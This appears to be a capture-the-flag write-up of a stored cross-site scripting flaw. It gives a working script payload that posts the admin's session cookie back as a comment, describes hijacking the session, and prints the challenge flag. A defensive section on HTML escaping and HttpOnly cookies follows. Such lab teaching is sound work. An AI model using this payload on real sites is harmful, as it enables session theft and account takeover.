The comment field is vulnerable to stored cross-site scripting: whatever we submit is rendered back into the page unescaped. So we inject a script that, when it runs in the admin's browser, posts a new comment whose body is the admin's `document.cookie`.
```
<script>
// Runs in the browser of whoever views the comment (e.g. the admin).
let data = new URLSearchParams();
data.append('name', 'Cookies');
// Leak the viewer's cookies (including the session ID) as the comment body.
data.append('comment', document.cookie);
// Post it back through the same comment endpoint so we can read it later.
fetch('/new-comment', {
  method: 'POST',
  headers: { "Content-Type": "application/x-www-form-urlencoded" },
  body: data,
});
</script>
```
The admin's cookies then show up as a new comment. We copy the admin's session ID into our own session cookie and go to the admin page, which gives the flag: `punk_{QRPMGW20G1XF20IH}`
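As an added illustration (not part of the original writeup or the challenge's code), here is a minimal model of the comment page in JavaScript: the unescaped rendering that lets the payload above execute, the escaped version that neutralizes it, and the `HttpOnly` cookie attribute that would have kept `document.cookie` from exposing the session ID even if the XSS had succeeded. The function names, the cookie name and the payload string are assumptions for illustration.

```javascript
// Added example, not from the original writeup or the challenge.
// renderCommentUnsafe, renderCommentSafe, escapeHtml, sessionCookie and the
// cookie name "session" are assumed names, not the challenge's real code.

// Vulnerable: interpolates user input straight into HTML, so a comment
// containing <script> is executed by every visitor, including the admin.
function renderCommentUnsafe(name, comment) {
  return `<div class="comment"><b>${name}</b>: ${comment}</div>`;
}

// Hardened: HTML-encode the characters that can break out of a text node
// or a quoted attribute before interpolating user input.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderCommentSafe(name, comment) {
  return `<div class="comment"><b>${escapeHtml(name)}</b>: ${escapeHtml(comment)}</div>`;
}

// Second layer: an HttpOnly session cookie is sent on requests but is not
// readable from document.cookie, so this payload would exfiltrate nothing.
function sessionCookie(sessionId) {
  return `session=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Constructed payload with the same shape as the one in the writeup.
const PAYLOAD =
  "<script>fetch('/new-comment',{method:'POST',body:document.cookie})</script>";

// Quick self-check when run directly.
const unsafe = renderCommentUnsafe('Cookies', PAYLOAD);
const safe = renderCommentSafe('Cookies', PAYLOAD);
console.log(unsafe.includes('<script>')); // true: the script tag survives
console.log(safe.includes('<script>'));   // false: encoded as &lt;script&gt;
```

The escaping fixes the injection at the sink; the `HttpOnly` flag limits the damage if an injection slips through anyway, which is why the two are normally used together.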